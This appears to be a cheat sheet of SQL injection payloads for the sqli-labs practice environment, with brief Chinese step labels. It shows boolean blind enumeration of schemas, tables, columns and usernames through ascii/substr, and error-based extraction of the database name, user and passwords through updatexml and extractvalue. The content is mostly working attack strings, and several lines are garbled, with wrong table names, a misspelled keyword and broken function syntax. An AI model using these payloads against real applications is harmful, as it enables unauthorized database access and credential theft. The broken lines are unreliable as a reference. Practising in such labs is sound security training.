id=1'and (select count(schema_name) from information_schema.schema)=7--+
?id=1’ and (select length(schema_name) from information_schema.schemata limit 0,1)=18--+
ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105–+
and (select count(table_name) from information_schema.tables where table_schema=’security’)=4–+
- 判断user表名下有几个字段 3
and (select count(column_name) from information_schema.columns where table_name=’users’ and table_schema=’security’)=3 --+
9.判断字段的长度
and (select length(column_name) from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1)=2 --+
10.通过acsii()函数判断字段的名字 id,username,password
and ascii((select column_name from information_schema.column where table_schema=’security’ and table_name=’users’ limit 0,1),1,1)=105 --+
11.判断username字段有多少行 13
(select count(username) from security.users)=13 --+
12.判断username字段的第一行值的长度 4
(select length(username) from security.users)=4 --+
13.通过ascii()函数判断username字段的第一行值的名字 Dump
ascii(substr((select username from security.users limit 0,1),1,1))=68 --+
127.0.0.1/sqli/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e,(select user())),1) --+
2.爆当前数据库下所有的表:
127.0.0.1/sqli/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’security’ limit 0,1)),1) --+
3.爆user表下的字段名:
127.0.0.1/sqli/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1)),1) --+
4.爆username.password的值:
127.0.0.1/sqli/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select password from security.users limit 0,1)),1) --+
127.0.0.1/sqli/Less-1/?id=1’ and (extractvalue(1,concat(0x7e,(selecet user()),0x7e))) --+